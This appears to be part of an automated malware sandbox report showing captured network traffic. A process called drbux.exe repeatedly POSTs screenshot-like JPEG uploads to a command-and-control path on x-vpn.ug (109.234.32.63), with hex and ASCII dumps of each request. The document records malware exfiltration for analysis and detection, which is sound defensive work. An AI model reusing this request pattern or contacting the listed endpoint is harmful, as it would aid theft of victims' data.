Aug 20, 2021 17:10:54.585328102 CEST	10424	OUT	Data Raw: 76 dc 6b 9f 82 ee f2 da d6 e2 d6 de f2 e2 1b 6b 9c 79 f0 c7 2b 2a 4b 8e 9b 94 1c 36 3d ea 11 18 00 e0 75 ac 95 39 29 29 3f eb fa b1 b7 b5 56 d3 fa fe ae ce f2 f5 1a fb e2 7f 8a 74 4f 97 fe 26 f2 4d 6b 1e f3 80 26 0c 1e 2e 7b 7c e8 a3 fe 05 53 0d Data Ascii: vkky+K6=u9))?VtO&Mk&.{\|Sv+Oi.8m9 `yk^8Q/U_F.-b[GF2c"K6?tM!>U0\|dy)G~nSmo=u]K
Aug 20, 2021 17:10:54.585340977 CEST	10427	OUT	Data Raw: 28 a2 80 12 8a 28 a0 61 45 14 50 02 d1 cd 1c d1 cd 30 0e 68 a3 9a 39 a4 01 45 14 53 10 52 52 d2 52 18 52 f7 a4 a2 80 16 81 45 2d 34 21 0d 14 b4 50 02 50 69 68 a0 02 96 8a 28 00 34 94 b4 1a 60 25 21 a5 a2 90 08 28 34 ec 53 4d 00 14 52 d2 50 01 45 Data Ascii: ((aEP0h9ESRRRRE-4!PPih(4`%!(4SMRPEPEP0-RwEPJZ;RPE`QE1(RQEL@(QGA)i)iM&8p4Zb@EA)At+c,SQBb4Yg 9sF0iT_T
Aug 20, 2021 17:10:54.585386992 CEST	10430	OUT	Data Raw: 3d 88 c1 fd 2b dc bc 03 6f 06 9d e0 6b 69 ff 00 e7 a2 bc f2 b0 19 27 93 fc 80 02 bc a8 f8 23 c4 a3 fe 61 33 fe 6b fe 35 e8 5f 0e f5 8f b2 db bf 86 b5 2f dc 5f 5b 39 f2 e3 72 32 ca 7e 62 3e a3 27 8f 7f 6a e9 cc e7 0a d4 7f 75 24 ec ee ec fa 1c 79 Data Ascii: =+oki'#a3k5_/_[9r2~b>'ju$yd'FbSW7"O&X<Me4yE2g&z2@ureHykrp?lu1nX^AnQ^{o]5X&l#^Zj
Aug 20, 2021 17:10:54.585398912 CEST	10433	OUT	Data Raw: 65 91 d1 58 b4 d1 92 51 b9 1d b7 1e 3a 7b 54 43 56 d4 8e 98 da 6b cd 6f 35 b3 33 b2 89 ad a2 91 e3 2c 72 db 1d 94 b2 02 46 70 a4 0c e7 d6 b1 8c 2a a9 5d f5 ff 00 24 6c e5 49 ab 2f eb 73 77 51 f0 be 95 a5 5d ea a2 ef 5c b8 fb 26 99 3c 76 93 4d 1d Data Ascii: eXQ:{TCVko53,rFp*]$lI/swQ]\&<vMgiqP>PIbG<zW[+=EW6wHn%%Fg5u~_8gXprW FN:GYxfkfy7Xv#}i[oHti)x,gbF>eI!
Aug 20, 2021 17:10:54.585458994 CEST	10435	OUT	Data Raw: 88 29 45 1f 5a 29 80 b4 b4 82 9d 41 20 28 22 96 8a a1 5c 41 4a 46 69 69 71 45 82 e4 7e 5a fa 52 79 0a 6a 5c 53 b1 47 2a 0e 76 57 fb 3f bd 27 90 c3 a7 35 67 6d 28 14 7b 34 1e d1 94 8c 4e 3b 1a 36 91 da af 62 82 28 f6 61 ed 0a 38 34 a3 ad 5c f2 d4 Data Ascii: )EZ)A ("\AJFiiqE~ZRyj\SG*vW?'5gm({4N;6b(a84\6}E/fV7vr0i60E+0QNQERNSEQKF3LAKF)j(ZbZ(!h@AEQKLZdE-DQKH)iQKH)j"pLZu KZ(Rd($p
Aug 20, 2021 17:10:54.585490942 CEST	10438	OUT	Data Raw: 48 e1 4b 49 45 32 47 53 87 4a 68 a0 50 21 e0 d2 d3 69 41 a0 43 85 3a 99 9a 50 69 92 3e 9c 0d 47 9a 70 34 08 90 1a 70 35 18 34 ec fa 53 21 a2 50 69 e1 aa 10 69 e0 d3 21 a2 70 d4 e0 41 ea 33 50 83 4e 06 95 88 68 79 85 1b b6 29 bf 65 cf 43 4a 0d 48 Data Ascii: HKIE2GSJhP!iAC:Pi>Gp4p54S!Pii!pA3PNhy)eCJH.;Sv`z4m6O]LljKy~z+Th4Q&EBsGjU"(aKgY{WXm9t\|7hg*NERhzWgsd+O(IsT\eR+Zb%Ntj&`w6
Aug 20, 2021 17:10:54.665316105 CEST	10504	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:10:54 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=5 X-Powered-By: PHP/5.6.37

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49733	109.234.32.63	80	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:10:57.931026936 CEST	10505	OUT	POST /hfV3vDtt/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428 Host: x-vpn.ug Content-Length: 94843 Cache-Control: no-cache
Aug 20, 2021 17:10:57.931212902 CEST	10505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 32 38 32 39 64 30 32 63 35 61 65 63 66 65 32 62 61 63 37 33 61 33 31 36 32 61 36 65 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------02829d02c5aecfe2bac73a3162a6e428Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 20, 2021 17:10:57.931443930 CEST	10515	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 20, 2021 17:10:57.931543112 CEST	10518	OUT	Data Raw: e9 c7 5c f4 e2 ba 1d 17 c3 3f 0e bc 46 2e 06 95 69 e7 f9 1b 7c cf de 5c 26 dd d9 c7 de 23 3d 0d 73 da 57 89 be cf a3 d9 43 ff 00 0b 0f ec be 5d bc 69 f6 7f ec 5d fe 56 14 0d 9b b1 f3 63 a6 7b e2 bb 7f 05 6a df da 9f 6e ff 00 8a 9b fb 6f cb f2 ff Data Ascii: \?F.i\|\&#=sWC]i]Vc{jnoNw{+s9&K:gjRRjB%3l%--)h7.)XWZv)1@\QK@@SR(QQ(((bb.2SF(
Aug 20, 2021 17:10:57.957978964 CEST	10528	OUT	Data Raw: fa 95 1e c7 4f f6 c6 33 f9 ff 00 05 fe 42 fd b9 ff 00 e7 8f fe 3d ff 00 d6 a8 de 43 33 ee 2b b7 8c 63 34 51 5a 53 c3 53 a7 2e 68 a3 0a f9 86 22 bc 39 2a 4a eb d1 0d a2 94 8a 54 46 91 d5 11 4b 3b 10 15 54 64 92 7a 01 5d 07 1d f4 1b 45 69 5c f8 7b Data Ascii: O3B=C3+c4QZSS.h"9JTFK;Tdz]Ei\{ZG-R44}OU$iu48>P{Jq?rXJ+x~^MZW!}CH-K\Z`p9 w:Z52M6J-`@ )Ns:QB??gL
Aug 20, 2021 17:10:57.958024979 CEST	10531	OUT	Data Raw: 65 91 d1 58 b4 d1 92 51 b9 1d b7 1e 3a 7b 54 43 56 d4 8e 98 da 6b cd 6f 35 b3 33 b2 89 ad a2 91 e3 2c 72 db 1d 94 b2 02 46 70 a4 0c e7 d6 b1 8c 2a a9 5d f5 ff 00 24 6c e5 49 ab 2f eb 73 77 51 f0 be 95 a5 5d ea a2 ef 5c b8 fb 26 99 3c 76 93 4d 1d Data Ascii: eXQ:{TCVko53,rFp*]$lI/swQ]\&<vMgiqP>PIbG<zW[+=EW6wHn%%Fg5u~_8gXprW FN:GYxfkfy7Xv#}i[oHti)x,gbF>eI!
Aug 20, 2021 17:10:57.958442926 CEST	10538	OUT	Data Raw: 88 29 45 1f 5a 29 80 b4 b4 82 9d 41 20 28 22 96 8a a1 5c 41 4a 46 69 69 71 45 82 e4 7e 5a fa 52 79 0a 6a 5c 53 b1 47 2a 0e 76 57 fb 3f bd 27 90 c3 a7 35 67 6d 28 14 7b 34 1e d1 94 8c 4e 3b 1a 36 91 da af 62 82 28 f6 61 ed 0a 38 34 a3 ad 5c f2 d4 Data Ascii: )EZ)A ("\AJFiiqE~ZRyj\SG*vW?'5gm({4N;6b(a84\6}E/fV7vr0i60E+0QNQERNSEQKF3LAKF)j(ZbZ(!h@AEQKLZdE-DQKH)iQKH)j"pLZu KZ(Rd($p
Aug 20, 2021 17:10:57.958466053 CEST	10543	OUT	Data Raw: 6d 7b e4 56 50 4f dc 16 81 45 2d 6c 62 5b d3 63 b2 9b 50 8a 1b f9 9e 08 25 ca 79 ca 40 11 b1 18 56 6e 0f ca 0e 33 df 19 ad 56 d3 2c 34 fd 62 df 44 bb b1 bf bf d5 48 11 cf 0d 9d e4 71 84 9d 9b 88 c1 31 be 70 08 07 dc 9f 4a cb d3 2f d7 4c be 5b df Data Ascii: m{VPOE-lb[cP%y@Vn3V,4bDHq1pJ/L[b*K yYs]b6o}t\|>$n5W5%}\]4]G]4{}\w>yx_uF8qm/XjcQDhf)bvmE,;h
Aug 20, 2021 17:10:57.983947992 CEST	10546	OUT	Data Raw: 10 94 a0 52 e2 8e d4 c4 15 ea 5f 07 3c 21 a1 78 af fb 6b fb 6a c7 ed 5f 66 f2 3c af df 3a 6d dd e6 6e fb ac 33 f7 47 5f 4a f2 da f6 3f 81 77 16 30 5a f8 95 35 0b 88 61 82 65 b7 53 e7 4a 10 30 c4 a0 f2 48 f5 ac 6b df 91 d8 d2 85 b9 f5 3d 07 fe 15 Data Ascii: R_<!xkj_f<:mn3G_J?w0Z5aeSJ0Hk=st/n.yi2<O5EG*=A=z<?PHKb,I,9\:r0\|psm/M;KaY<bAyk>0zL^Xd
Aug 20, 2021 17:10:57.984014034 CEST	10549	OUT	Data Raw: ff 00 b2 d7 b0 fd 9a c5 ff 00 87 15 e4 df 15 a2 8e dc 44 90 9c a9 97 3f f8 ed 6f 42 ba 94 ad 63 2a b8 67 06 a5 73 c5 c9 34 dc 1a 93 02 93 15 91 dd 73 a0 f0 e7 88 93 4a 8a 5b 7b a1 23 c2 7e 68 f6 00 48 3d c7 3d 8f f9 eb 5b da 77 8b 6c ef ae 7c 89 Data Ascii: D?oBc*gs4sJ[{#~hH==[wl\|#x,e`9"AZRKCFg[j0NoqGC\Zcv]==-_G=kG8vqRU:EsIRq KcR,RN
Aug 20, 2021 17:10:57.984046936 CEST	10551	OUT	Data Raw: 7c 77 37 5a 9d 85 9c b2 c2 6e 21 b5 b8 69 04 b2 a0 04 82 36 a1 55 dd 83 b4 33 29 3c 76 20 9d 24 d7 ec 4e 8b a7 68 0f 77 04 70 9b 1b 9b 69 af a3 b6 3e 65 bc 8d 34 8e a4 3e d1 21 8d 97 68 65 1c 6d 73 c6 78 a2 df 54 d1 a6 9c ea d7 37 56 6c 1f 4b 16 Data Ascii: \|w7Zn!i6U3)<v $Nhwpi>e4>!hemsxT7VlKuK)8<hX(6wp2^?OKO&zhWO-Y;fH>,bll?6;J=^Zmh~4i@`v0wv{c5JZpjrj]%P\Y
Aug 20, 2021 17:10:59.037519932 CEST	10602	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:10:59 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=5 X-Powered-By: PHP/5.6.37

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.3	49734	109.234.32.63	80	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:10:59.407685995 CEST	10603	OUT	POST /hfV3vDtt/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428 Host: x-vpn.ug Content-Length: 94843 Cache-Control: no-cache
Aug 20, 2021 17:10:59.407867908 CEST	10603	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 32 38 32 39 64 30 32 63 35 61 65 63 66 65 32 62 61 63 37 33 61 33 31 36 32 61 36 65 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------02829d02c5aecfe2bac73a3162a6e428Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 20, 2021 17:10:59.408201933 CEST	10613	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 20, 2021 17:10:59.408354998 CEST	10616	OUT	Data Raw: e9 c7 5c f4 e2 ba 1d 17 c3 3f 0e bc 46 2e 06 95 69 e7 f9 1b 7c cf de 5c 26 dd d9 c7 de 23 3d 0d 73 da 57 89 be cf a3 d9 43 ff 00 0b 0f ec be 5d bc 69 f6 7f ec 5d fe 56 14 0d 9b b1 f3 63 a6 7b e2 bb 7f 05 6a df da 9f 6e ff 00 8a 9b fb 6f cb f2 ff Data Ascii: \?F.i\|\&#=sWC]i]Vc{jnoNw{+s9&K:gjRRjB%3l%--)h7.)XWZv)1@\QK@@SR(QQ(((bb.2SF(
Aug 20, 2021 17:10:59.434851885 CEST	10619	OUT	Data Raw: fa 95 1e c7 4f f6 c6 33 f9 ff 00 05 fe 42 fd b9 ff 00 e7 8f fe 3d ff 00 d6 a8 de 43 33 ee 2b b7 8c 63 34 51 5a 53 c3 53 a7 2e 68 a3 0a f9 86 22 bc 39 2a 4a eb d1 0d a2 94 8a 54 46 91 d5 11 4b 3b 10 15 54 64 92 7a 01 5d 07 1d f4 1b 45 69 5c f8 7b Data Ascii: O3B=C3+c4QZSS.h"9JTFK;Tdz]Ei\{ZG-R44}OU$iu48>P{Jq?rXJ+x~^MZW!}CH-K\Z`p9 w:Z52M6J-`@ )Ns:QB??gL
Aug 20, 2021 17:10:59.434942007 CEST	10624	OUT	Data Raw: 76 dc 6b 9f 82 ee f2 da d6 e2 d6 de f2 e2 1b 6b 9c 79 f0 c7 2b 2a 4b 8e 9b 94 1c 36 3d ea 11 18 00 e0 75 ac 95 39 29 29 3f eb fa b1 b7 b5 56 d3 fa fe ae ce f2 f5 1a fb e2 7f 8a 74 4f 97 fe 26 f2 4d 6b 1e f3 80 26 0c 1e 2e 7b 7c e8 a3 fe 05 53 0d Data Ascii: vkky+K6=u9))?VtO&Mk&.{\|Sv+Oi.8m9 `yk^8Q/U_F.-b[GF2c"K6?tM!>U0\|dy)G~nSmo=u]K
Aug 20, 2021 17:10:59.434964895 CEST	10635	OUT	Data Raw: 3d 88 c1 fd 2b dc bc 03 6f 06 9d e0 6b 69 ff 00 e7 a2 bc f2 b0 19 27 93 fc 80 02 bc a8 f8 23 c4 a3 fe 61 33 fe 6b fe 35 e8 5f 0e f5 8f b2 db bf 86 b5 2f dc 5f 5b 39 f2 e3 72 32 ca 7e 62 3e a3 27 8f 7f 6a e9 cc e7 0a d4 7f 75 24 ec ee ec fa 1c 79 Data Ascii: =+oki'#a3k5_/_[9r2~b>'ju$yd'FbSW7"O&X<Me4yE2g&z2@ureHykrp?lu1nX^AnQ^{o]5X&l#^Zj
Aug 20, 2021 17:10:59.434983015 CEST	10639	OUT	Data Raw: df d4 a3 45 14 77 af 59 1e 08 b4 94 b4 94 31 09 48 69 68 a0 61 4b 48 29 68 40 14 b4 94 b4 08 50 69 69 29 69 89 85 2d 25 2d 50 85 14 ea 68 a5 a0 4c 5a 5a 4a 51 4c 41 4b 49 45 30 1d 45 25 14 c4 2d 14 51 40 85 a2 8a 29 80 b4 e1 4d 14 a0 d3 42 1f 4b Data Ascii: EwY1HihaKH)h@Pii)i-%-PhLZZJQLAKIE0E%-Q@)MBKMW$p4`U\E-1<1@4hIx`iRd8pLPkE6C4znfFp&+892j)ajX=89kfHtOzdOH&nH>Qu*60
Aug 20, 2021 17:10:59.435029030 CEST	10642	OUT	Data Raw: 38 53 69 41 a0 42 8e b4 e1 de 9b 4b 4d 08 5a 28 a5 a6 48 b8 a4 c5 28 14 a0 62 9d 80 6e 28 a5 34 94 02 0a 29 28 a4 01 4b 45 21 a0 05 a5 14 0a 29 80 b4 b4 94 a2 98 85 a3 34 94 50 84 3b 34 0e b4 0a 33 54 03 a8 a6 e6 81 41 36 16 96 92 8a 00 5a 28 a0 Data Ascii: 8SiABKMZ(H(bn(4)(KE!)4P;43TA6Z(SE-%-14JZ8ST!iE6UQIK@hU8STc/iEYGZm(4GN&iiLKf4j,L38)-4h&-$`4+
Aug 20, 2021 17:10:59.462758064 CEST	10684	OUT	Data Raw: 10 94 a0 52 e2 8e d4 c4 15 ea 5f 07 3c 21 a1 78 af fb 6b fb 6a c7 ed 5f 66 f2 3c af df 3a 6d dd e6 6e fb ac 33 f7 47 5f 4a f2 da f6 3f 81 77 16 30 5a f8 95 35 0b 88 61 82 65 b7 53 e7 4a 10 30 c4 a0 f2 48 f5 ac 6b df 91 d8 d2 85 b9 f5 3d 07 fe 15 Data Ascii: R_<!xkj_f<:mn3G_J?w0Z5aeSJ0Hk=st/n.yi2<O5EG*=A=z<?PHKb,I,9\:r0\|psm/M;KaY<bAyk>0zL^Xd
Aug 20, 2021 17:10:59.462920904 CEST	10686	OUT	Data Raw: 0f cd 00 d3 33 40 34 5c 2c 3f 34 bb a9 94 84 d1 70 b1 26 ea 4c d3 33 46 68 b8 58 7e ea 0b 53 33 46 68 b8 58 76 69 41 a6 e6 8a 2e 16 1c 4d 06 9b 9a 09 a1 bd 02 c1 cd 19 e2 9b 9a 29 0c 76 68 cd 37 34 66 80 b0 ec d2 53 73 49 9a 57 1d 87 93 49 9a 6e Data Ascii: 3@4\,?4p&L3FhX~S3FhXviA.M)vh74fSsIWIni3Jfh&fi+)3FisHM&4adP1OZ Ri\YU%&M!Z&h1)EN+(Vkcmi}@8O5>eVsN
Aug 20, 2021 17:10:59.523740053 CEST	10700	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:10:59 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=5 X-Powered-By: PHP/5.6.37

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.3	49735	109.234.32.63	80	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:10:59.891447067 CEST	10701	OUT	POST /hfV3vDtt/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428 Host: x-vpn.ug Content-Length: 94843 Cache-Control: no-cache
Aug 20, 2021 17:10:59.891604900 CEST	10701	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 32 38 32 39 64 30 32 63 35 61 65 63 66 65 32 62 61 63 37 33 61 33 31 36 32 61 36 65 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------02829d02c5aecfe2bac73a3162a6e428Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 20, 2021 17:10:59.891791105 CEST	10711	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 20, 2021 17:10:59.891876936 CEST	10714	OUT	Data Raw: e9 c7 5c f4 e2 ba 1d 17 c3 3f 0e bc 46 2e 06 95 69 e7 f9 1b 7c cf de 5c 26 dd d9 c7 de 23 3d 0d 73 da 57 89 be cf a3 d9 43 ff 00 0b 0f ec be 5d bc 69 f6 7f ec 5d fe 56 14 0d 9b b1 f3 63 a6 7b e2 bb 7f 05 6a df da 9f 6e ff 00 8a 9b fb 6f cb f2 ff Data Ascii: \?F.i\|\&#=sWC]i]Vc{jnoNw{+s9&K:gjRRjB%3l%--)h7.)XWZv)1@\QK@@SR(QQ(((bb.2SF(
Aug 20, 2021 17:10:59.917468071 CEST	10717	OUT	Data Raw: fa 95 1e c7 4f f6 c6 33 f9 ff 00 05 fe 42 fd b9 ff 00 e7 8f fe 3d ff 00 d6 a8 de 43 33 ee 2b b7 8c 63 34 51 5a 53 c3 53 a7 2e 68 a3 0a f9 86 22 bc 39 2a 4a eb d1 0d a2 94 8a 54 46 91 d5 11 4b 3b 10 15 54 64 92 7a 01 5d 07 1d f4 1b 45 69 5c f8 7b Data Ascii: O3B=C3+c4QZSS.h"9JTFK;Tdz]Ei\{ZG-R44}OU$iu48>P{Jq?rXJ+x~^MZW!}CH-K\Z`p9 w:Z52M6J-`@ )Ns:QB??gL
Aug 20, 2021 17:10:59.917525053 CEST	10720	OUT	Data Raw: 76 dc 6b 9f 82 ee f2 da d6 e2 d6 de f2 e2 1b 6b 9c 79 f0 c7 2b 2a 4b 8e 9b 94 1c 36 3d ea 11 18 00 e0 75 ac 95 39 29 29 3f eb fa b1 b7 b5 56 d3 fa fe ae ce f2 f5 1a fb e2 7f 8a 74 4f 97 fe 26 f2 4d 6b 1e f3 80 26 0c 1e 2e 7b 7c e8 a3 fe 05 53 0d Data Ascii: vkky+K6=u9))?VtO&Mk&.{\|Sv+Oi.8m9 `yk^8Q/U_F.-b[GF2c"K6?tM!>U0\|dy)G~nSmo=u]K
Aug 20, 2021 17:10:59.917563915 CEST	10725	OUT	Data Raw: 28 a2 80 12 8a 28 a0 61 45 14 50 02 d1 cd 1c d1 cd 30 0e 68 a3 9a 39 a4 01 45 14 53 10 52 52 d2 52 18 52 f7 a4 a2 80 16 81 45 2d 34 21 0d 14 b4 50 02 50 69 68 a0 02 96 8a 28 00 34 94 b4 1a 60 25 21 a5 a2 90 08 28 34 ec 53 4d 00 14 52 d2 50 01 45 Data Ascii: ((aEP0h9ESRRRRE-4!PPih(4`%!(4SMRPEPEP0-RwEPJZ;RPE`QE1(RQEL@(QGA)i)iM&8p4Zb@EA)At+c,SQBb4Yg 9sF0iT_T
Aug 20, 2021 17:10:59.917587996 CEST	10728	OUT	Data Raw: 65 91 d1 58 b4 d1 92 51 b9 1d b7 1e 3a 7b 54 43 56 d4 8e 98 da 6b cd 6f 35 b3 33 b2 89 ad a2 91 e3 2c 72 db 1d 94 b2 02 46 70 a4 0c e7 d6 b1 8c 2a a9 5d f5 ff 00 24 6c e5 49 ab 2f eb 73 77 51 f0 be 95 a5 5d ea a2 ef 5c b8 fb 26 99 3c 76 93 4d 1d Data Ascii: eXQ:{TCVko53,rFp*]$lI/swQ]\&<vMgiqP>PIbG<zW[+=EW6wHn%%Fg5u~_8gXprW FN:GYxfkfy7Xv#}i[oHti)x,gbF>eI!
Aug 20, 2021 17:10:59.917730093 CEST	10733	OUT	Data Raw: 88 29 45 1f 5a 29 80 b4 b4 82 9d 41 20 28 22 96 8a a1 5c 41 4a 46 69 69 71 45 82 e4 7e 5a fa 52 79 0a 6a 5c 53 b1 47 2a 0e 76 57 fb 3f bd 27 90 c3 a7 35 67 6d 28 14 7b 34 1e d1 94 8c 4e 3b 1a 36 91 da af 62 82 28 f6 61 ed 0a 38 34 a3 ad 5c f2 d4 Data Ascii: )EZ)A ("\AJFiiqE~ZRyj\SG*vW?'5gm({4N;6b(a84\6}E/fV7vr0i60E+0QNQERNSEQKF3LAKF)j(ZbZ(!h@AEQKLZdE-DQKH)iQKH)j"pLZu KZ(Rd($p
Aug 20, 2021 17:10:59.917745113 CEST	10734	OUT	Data Raw: df d4 a3 45 14 77 af 59 1e 08 b4 94 b4 94 31 09 48 69 68 a0 61 4b 48 29 68 40 14 b4 94 b4 08 50 69 69 29 69 89 85 2d 25 2d 50 85 14 ea 68 a5 a0 4c 5a 5a 4a 51 4c 41 4b 49 45 30 1d 45 25 14 c4 2d 14 51 40 85 a2 8a 29 80 b4 e1 4d 14 a0 d3 42 1f 4b Data Ascii: EwY1HihaKH)h@Pii)i-%-PhLZZJQLAKIE0E%-Q@)MBKMW$p4`U\E-1<1@4hIx`iRd8pLPkE6C4znfFp&+892j)ajX=89kfHtOzdOH&nH>Qu*60
Aug 20, 2021 17:10:59.917773962 CEST	10740	OUT	Data Raw: 6d 7b e4 56 50 4f dc 16 81 45 2d 6c 62 5b d3 63 b2 9b 50 8a 1b f9 9e 08 25 ca 79 ca 40 11 b1 18 56 6e 0f ca 0e 33 df 19 ad 56 d3 2c 34 fd 62 df 44 bb b1 bf bf d5 48 11 cf 0d 9d e4 71 84 9d 9b 88 c1 31 be 70 08 07 dc 9f 4a cb d3 2f d7 4c be 5b df Data Ascii: m{VPOE-lb[cP%y@Vn3V,4bDHq1pJ/L[b*K yYs]b6o}t\|>$n5W5%}\]4]G]4{}\w>yx_uF8qm/XjcQDhf)bvmE,;h
Aug 20, 2021 17:10:59.999571085 CEST	10799	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:10:59 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=5 X-Powered-By: PHP/5.6.37

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.3	49736	109.234.32.63	80	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:11:00.297302961 CEST	10799	OUT	POST /hfV3vDtt/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428 Host: x-vpn.ug Content-Length: 94843 Cache-Control: no-cache
Aug 20, 2021 17:11:00.297863960 CEST	10799	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 32 38 32 39 64 30 32 63 35 61 65 63 66 65 32 62 61 63 37 33 61 33 31 36 32 61 36 65 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------02829d02c5aecfe2bac73a3162a6e428Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 20, 2021 17:11:00.298086882 CEST	10809	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 20, 2021 17:11:00.298223972 CEST	10812	OUT	Data Raw: e9 c7 5c f4 e2 ba 1d 17 c3 3f 0e bc 46 2e 06 95 69 e7 f9 1b 7c cf de 5c 26 dd d9 c7 de 23 3d 0d 73 da 57 89 be cf a3 d9 43 ff 00 0b 0f ec be 5d bc 69 f6 7f ec 5d fe 56 14 0d 9b b1 f3 63 a6 7b e2 bb 7f 05 6a df da 9f 6e ff 00 8a 9b fb 6f cb f2 ff Data Ascii: \?F.i\|\&#=sWC]i]Vc{jnoNw{+s9&K:gjRRjB%3l%--)h7.)XWZv)1@\QK@@SR(QQ(((bb.2SF(
Aug 20, 2021 17:11:00.323853016 CEST	10818	OUT	Data Raw: fa 95 1e c7 4f f6 c6 33 f9 ff 00 05 fe 42 fd b9 ff 00 e7 8f fe 3d ff 00 d6 a8 de 43 33 ee 2b b7 8c 63 34 51 5a 53 c3 53 a7 2e 68 a3 0a f9 86 22 bc 39 2a 4a eb d1 0d a2 94 8a 54 46 91 d5 11 4b 3b 10 15 54 64 92 7a 01 5d 07 1d f4 1b 45 69 5c f8 7b Data Ascii: O3B=C3+c4QZSS.h"9JTFK;Tdz]Ei\{ZG-R44}OU$iu48>P{Jq?rXJ+x~^MZW!}CH-K\Z`p9 w:Z52M6J-`@ )Ns:QB??gL
